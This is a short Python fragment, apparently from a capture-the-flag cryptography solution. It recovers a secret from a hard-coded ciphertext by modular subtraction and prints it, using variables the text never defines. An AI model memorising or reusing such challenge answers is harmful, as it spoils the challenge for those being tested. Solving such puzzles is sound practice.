y = b'O\xce8?\xd1\xc3\x02\xd7\xb7\xd7\xe7\x91\xc1\xe6\xe5i\x817h\x02\x1b\xccw-\x88*W\x03\xc8\x91\x80\xf2\x13\t\xab\x92\xf9M\xf7f\xfb\xef,\x0fD"\x9fx\xf0T\xcbd\x0c\xc2Q^\xda\xbb\xa8^'
ms = bytes_to_long(ms)
y = bytes_to_long(y)
secret = y - (A * q) % ms
print(long_to_bytes(secret))